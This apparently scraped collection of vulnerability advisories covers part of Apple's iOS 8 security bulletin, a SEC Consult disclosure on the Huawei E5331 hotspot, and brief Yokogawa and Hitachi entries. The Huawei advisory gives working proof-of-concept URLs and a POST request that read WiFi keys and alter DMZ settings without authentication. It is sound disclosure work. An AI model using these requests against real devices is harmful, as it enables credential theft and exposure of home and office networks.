CVE-2014-4381 : Ian Beer of Google Project Zero
Lockdown
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A device can be manipulated into incorrectly presenting the
home screen when the device is activation locked
Description: An issue existed with unlocking behavior that caused a
device to proceed to the home screen even if it should still be in an
activation locked state. This was addressed by changing the
information a device verifies during an unlock request.
CVE-ID
CVE-2014-1360
Mail
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Login credentials can be sent in plaintext even if the
server has advertised the LOGINDISABLED IMAP capability
Description: Mail sent the LOGIN command to servers even if they had
advertised the LOGINDISABLED IMAP capability. This issue is mostly a
concern when connecting to servers that are configured to accept non-
encrypted connections and that advertise LOGINDISABLED. This issue
was addressed by respecting the LOGINDISABLED IMAP capability.
CVE-ID
CVE-2014-4366 : Mark Crispin
Mail
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to an iOS device may
potentially read email attachments
Description: A logic issue existed in Mail's use of Data Protection
on email attachments. This issue was addressed by properly setting
the Data Protection class for email attachments.
CVE-ID
CVE-2014-1348 : Andreas Kurtz of NESO Security Labs
Profiles
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Voice Dial is unexpectedly enabled after upgrading iOS
Description: Voice Dial was enabled automatically after upgrading
iOS. This issue was addressed through improved state management.
CVE-ID
CVE-2014-4367 : Sven Heinemann
Safari
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: User credentials may be disclosed to an unintended site via
autofill
Description: Safari may have autofilled user names and passwords
into a subframe from a different domain than the main frame. This
issue was addressed through improved origin tracking.
CVE-ID
CVE-2013-5227 : Niklas Malmgren of Klarna AB
Safari
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker with a privileged network position may intercept
user credentials
Description: Saved passwords were autofilled on http sites, on https
sites with broken trust, and in iframes. This issue was addressed by
restricting password autofill to the main frame of https sites with
valid certificate chains.
CVE-ID
CVE-2014-4363 : David Silver, Suman Jana, and Dan Boneh of Stanford
University working with Eric Chen and Collin Jackson of Carnegie
Mellon University
Sandbox Profiles
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Apple ID information is accessible by third-party apps
Description: An information disclosure issue existed in the third-
party app sandbox. This issue was addressed by improving the third-
party sandbox profile.
CVE-ID
CVE-2014-4362 : Andreas Kurtz of NESO Security Labs and Markus
TroBbach of Heilbronn University
Settings
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Text message previews may appear at the lock screen even
when this feature is disabled
Description: An issue existed in the previewing of text message
notifications at the lock screen. As a result, the contents of
received messages would be shown at the lock screen even when
previews were disabled in Settings. The issue was addressed through
improved observance of this setting.
CVE-ID
CVE-2014-4356 : Mattia Schirinzi from San Pietro Vernotico (BR),
Italy
syslog
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A local user may be able to change permissions on arbitrary
files
Description: syslogd followed symbolic links while changing
permissions on files. This issue was addressed through improved
handling of symbolic links.
CVE-ID
CVE-2014-4372 : Tielei Wang and YeongJin Jang of Georgia Tech
Information Security Center (GTISC)
Weather
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Location information was sent unencrypted
Description: An information disclosure issue existed in an API used
to determine local weather. This issue was addressed by changing
APIs.
WebKit
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious website may be able to track users even when
private browsing is enabled
Description: A web application could store HTML 5 application cache
data during normal browsing and then read the data during private
browsing. This was addressed by disabling access to the application
cache when in private browsing mode.
CVE-ID
CVE-2014-4409 : Yosuke Hasegawa (NetAgent Co., Led.)
WebKit
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2013-6663 : Atte Kettunen of OUSPG
CVE-2014-1384 : Apple
CVE-2014-1385 : Apple
CVE-2014-1387 : Google Chrome Security Team
CVE-2014-1388 : Apple
CVE-2014-1389 : Apple
CVE-2014-4410 : Eric Seidel of Google
CVE-2014-4411 : Google Chrome Security Team
CVE-2014-4412 : Apple
CVE-2014-4413 : Apple
CVE-2014-4414 : Apple
CVE-2014-4415 : Apple
WiFi
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A device may be passively tracked by its WiFi MAC address
Description: An information disclosure existed because a stable MAC
address was being used to scan for WiFi networks. This issue was
addressed by randomizing the MAC address for passive WiFi scans.
Note:
iOS 8 contains changes to some diagnostic capabilities.
For details, please consult http://support.apple.com/kb/HT6331
iOS 8 now permits devices to untrust all previously trusted
computers. Instructions can be found at
http://support.apple.com/kb/HT5868
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "8".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJUGNl6AAoJEBcWfLTuOo7tD0oP/2QjJQxEaVKH5GhKX7HTLB9e
W2oU7kHqds6p9HQg3iw9SXs/c03EH2++Tf5+Kul8V94QZB2jD4T28MUctAjrvSX7
rHRTPFJn8dm6Dr/zReon3q6ph8PlnDGySJLON/RwrSwHpWcd8wA4uCC6gTPur3T9
tNfPrkT+b4iO4QsSLQaK6bJqTFmWruqEFwdXmtOY8qYOsEANMr9HPdm9WwEcdQaZ
tZZpa1FU4jIdfHZw18a3rzQ1LW4OO9fWbihKRgY8xq+Q8+Cs/EnY9hCIN0jl0OHm
TMvKojeO4CCBAKpwUQOVERkI4Oc7Ux6GefT84ttYu095KzmZVjq9yWmi0FcBAVMV
s32YL/alCNm86uNvxvkAvWJ3ZeZymuoTZHoNX5YNGIhuunRZONK94ay1RtYMdWPl
iesWma7tn9g/xMWRaDKfRy2vtUuetBVxiaAr3AqvMp+mx0lmmLOO8x1SxeKe+QUy
HO1O1DVAWPv2JIEf7mstDBHfQKYBRcgM3P4DJAgkrgH42ZNWb06ZyQhpAvFLVncD
g2/Q0cwUlPOvdNKxoUD3IVVwPZeIefw3vqrSHXSQPpIMkJJFrBbIB8v6nnkheebg
h5bPWfIxP0wuBjWz8SjOlPaSjxNxpmHK3H0tLU1q6TneBlmte405ytT4zSI7bvOY
ZZCDpw0BRMEXUyXqTns7
=hlmW
-----END PGP SIGNATURE-----
| VAR-201403-0571 | No CVE | Huawei E5331 has multiple vulnerabilities |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Huawei E5331 MiFi mobile hotspot is a 3G router device. Huawei E5331 has information disclosure and security bypass vulnerabilities, which allow remote attackers to change the device configuration without having to verify access to the WEB interface URL, obtain configuration information, or submit a specially crafted POST request. Huawei E5331 is a 3G wireless network card from Huawei, China.
A security bypass vulnerability and an information disclosure vulnerability exist in Huawei E5331. Attackers can use these vulnerabilities to gain sensitive information or gain access to devices. There are vulnerabilities in Huawei E5331 21.344.11.00.414 version, other versions may also be affected. SEC Consult Vulnerability Lab Security Advisory < 20140307-0 >
=======================================================================
title: Unauthenticated access & manipulation of settings
product: Huawei E5331 MiFi mobile hotspot
vulnerable version: Software version 21.344.11.00.414
fixed version: Software version 21.344.27.00.414
impact: High
homepage: http://www.huawei.com
found: 2013-12-06
by: J. Greil
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Huawei E5331 Mobile WiFi is a high-speed packet access mobile hotspot. It is a
multi-mode wireless terminal for SOHO (Small Office and Home Office) and
business professionals.
You can connect the E5331 with the USB interface of a computer, or connect the
E5331 with the Wi-Fi. In the service area of the HSPA+/HSPA/UMTS/EDGE/GPRS/GSM
network, you can surf the Internet and send/receive messages/emails
cordlessly. The E5331 is fast, reliable, and easy to operate. Thus, mobile
users can experience many new features and services with the E5331. These
features and services will enable a large number of users to use the E5331 and
the average revenue per user (ARPU) of operators will increase substantially."
source:
http://www.huaweidevice.com/worldwide/productFeatures.do?pinfoId=3272&directoryId=5009&treeId=3619&tab=0
Business recommendation:
------------------------
All discovered vulnerabilities can be exploited without authentication and
therefore pose a high security risk.
The scope of the test, where the vulnerabilities have been identified, was a
very short crash-test of the device. It is assumed that further
vulnerabilities exist within this product!
The recommendation of SEC Consult is to perform follow-up security tests of
this device and similar devices. WLAN passwords in clear text or IMEI information of the SIM card) and
even manipulate all settings in the web administration interface! This also
works when the "Enable firewall" feature is set in "Firewall Switch" settings
of the web interface.
This can even be exploited remotely via Internet depending on the mobile
operator setup. E.g. if the operator allows incoming connections for mobile
networks, the web interface would be accessible and exploitable publicly.
Otherwise those settings can be manipulated via CSRF attacks too. The DNS name
"mobilewifi.home" can be used regardless of the IP address settings.
Proof of concept:
-----------------
An attacker simply needs to access certain URLs of the web interface in order
to receive the configuration. No authentication is needed!
URL for retrieving wireless passwords / PSK in clear text:
http://mobilewifi.home/api/wlan/security-settings
XML response:
<?xml version="1.0" encoding="UTF-8"?>
<response>
<WifiAuthmode>WPA2-PSK</WifiAuthmode>
<WifiBasicencryptionmodes>NONE</WifiBasicencryptionmodes>
<WifiWpaencryptionmodes>AES</WifiWpaencryptionmodes>
<WifiWepKey1>12345</WifiWepKey1>
<WifiWepKey2>12345</WifiWepKey2>
<WifiWepKey3>12345</WifiWepKey3>
<WifiWepKey4>12345</WifiWepKey4>
<WifiWepKeyIndex>1</WifiWepKeyIndex>
<WifiWpapsk>XXXXX</WifiWpapsk>
<WifiWpsenbl>0</WifiWpsenbl>
<WifiWpscfg>1</WifiWpscfg>
<WifiRestart>1</WifiRestart>
</response>
Further interesting URLs to retrieve information from (not complete):
http://mobilewifi.home/api/wlan/wps (WPS pin)
http://mobilewifi.home/api/security/dmz (DMZ host settings)
http://mobilewifi.home/api/pin/simlock (enable SIM lock)
http://mobilewifi.home/api/wlan/host-list (connected wireless clients)
http://mobilewifi.home/api/device/information (IMEI, MAC, etc)
[...]
In order to change settings it is also simply possible to issue POST requests
to the specific URLs. E.g. change the "DMZ Settings" in order to make internal
clients (client IP addresses can be retrieved through the host-list from above)
reachable from the outside:
POST /api/security/dmz HTTP/1.1
Host: mobilewifi.home
<?xml version="1.0"
encoding="UTF-8"?><request><DmzStatus>1</DmzStatus><DmzIPAddress>A.B.C.D</DmzIPAddress></request>
All those requests can either be issued via CSRF or also from the Internet, if
the web interface of the device is reachable (depends on the mobile operator
settings).
Vulnerable / tested versions:
-----------------------------
The following version of the device has been tested which was the latest
version available at the time of identification of the flaw (the automatic
update feature did not supply any new version):
Software version: 21.344.11.00.414
Web UI version: 11.001.07.00.03
Vendor contact timeline:
------------------------
2013-12-11: Contacting vendor through psirt@huawei.com
2013-12-12: Reply from vendor
2013-12-18: Vendor requests some further details, sending answer
2014-01-09: Vendor: problem will be resolved in new firmware version
2014-01-14: Patch is planned for 6th March 2014
2014-03-07: SEC Consult releases coordinated security advisory
Solution:
---------
According to the vendor the following firmware release fixes the identified
problems:
* Software version 21.344.27.00.414
It contains the following improvements according to the vendor:
1. Users cannot obtain or set any device parameter without logging in.
2. Added server-side authentication to discard illegitimate packets.
The firmware can be downloaded from here:
http://consumer.huawei.com/en/support/downloads/index.htm
The item is called: E5331Update_21.344.27.00.414.B757
Workaround:
-----------
None
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
Interested in working with the experts of SEC Consult?
Write to career@sec-consult.com
EOF J. Greil / @2014
| VAR-201403-0448 | CVE-2014-0784 |
Yokogawa CENTUM CS3000 'BKBCopyD.exe' Stack Buffer Overflow Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201403-0243 |
CVSS V2: 8.3 CVSS V3: - Severity: HIGH |
Stack-based buffer overflow in BKBCopyD.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet. The Yokogawa CENTUM CS3000 is a production control system. Yokogawa CENTUM CS3000 is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer.
Successful exploits may allow an attacker to execute arbitrary code with system privileges. Failed attempts will likely cause a denial-of-service condition.
Yokogawa CENTUM CS3000 R3.08.50 is vulnerable; other versions may also be affected. Yokogawa CENTUM CS is a set of large-scale production control system of Japan Yokogawa Electric Corporation (Yokogawa). The system is mainly used in multi-field factories
| VAR-201403-0707 | No CVE | Unknown Cross-Site Scripting Vulnerability in Hitachi JP1 / Integrated Management-Service Support |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Hitachi JP1 / Integrated Management is a solution that monitors business execution and centrally manages system content such as OS and applications.
The unknown input of the related View lacks sufficient filtering when returned to the users of Service Support. Remote attackers can use the vulnerability to construct malicious URIs, induce users to resolve, obtain sensitive cookies, hijack sessions or perform malicious operations on the client. Hitachi JP1/Integrated Management - Service Support is prone to an unspecified cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
The following versions are vulnerable:
Hitachi JP1/Integrated Management - Service Support versions 09-50 through 09-50-06
Hitachi JP1/Integrated Management - Service Support versions 10-00 through 10-00-03
Hitachi JP1/Integrated Management - Service Support version 10-10
Note: This issue affects Hitachi JP1/Integrated Management - Service Support for Windows platforms
| VAR-201403-0716 | No CVE | Hitachi JP1 / File Transmission Server / FTP Security Bypass Vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Hitachi JP1 / File Transmission Server / FTP is a file transfer service program.
Hitachi JP1 / File Transmission Server / FTP failed to properly restrict directory access, allowing remote attackers to exploit the vulnerability to access restricted directories. Hitachi JP1/File Transmission Server/FTP is prone to a security-bypass vulnerability.
An attacker may leverage this issue to bypass certain security restrictions and gain unauthorized access